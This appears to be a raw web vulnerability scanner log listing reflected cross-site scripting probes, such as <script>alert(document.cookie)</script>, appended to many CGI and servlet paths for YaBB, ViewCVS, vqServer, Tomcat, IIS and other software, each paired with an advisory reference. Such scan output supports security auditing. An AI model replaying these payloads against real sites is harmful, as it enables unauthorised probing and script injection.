- + OSVDB-2820: /index.1.html/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
- + /index.1.html/https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
- + /index.1.html/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>: IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-17665: /index.1.html/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
- + OSVDB-17666: /index.1.html/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
- + /index.1.html/nosuchurl/><script>alert('Vulnerable')</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
- + OSVDB-3624: /index.1.html/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi.cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/webcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-914/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-915/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/mpcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/ows-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-sys/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-local/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/htbin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgibin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgis/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/scripts/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-win/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/fcgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-exe/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-home/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-perl/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/scgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-bin-sdb/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9234: /index.1.html/cgi-mod/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi.cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/webcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-914/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-915/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/mpcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/ows-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-sys/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-local/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/htbin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgibin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgis/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/scripts/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-win/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/fcgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-exe/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-home/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-perl/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/scgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-bin-sdb/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-mod/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi.cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/webcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-914/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-915/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/mpcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/ows-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-sys/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-local/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/htbin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
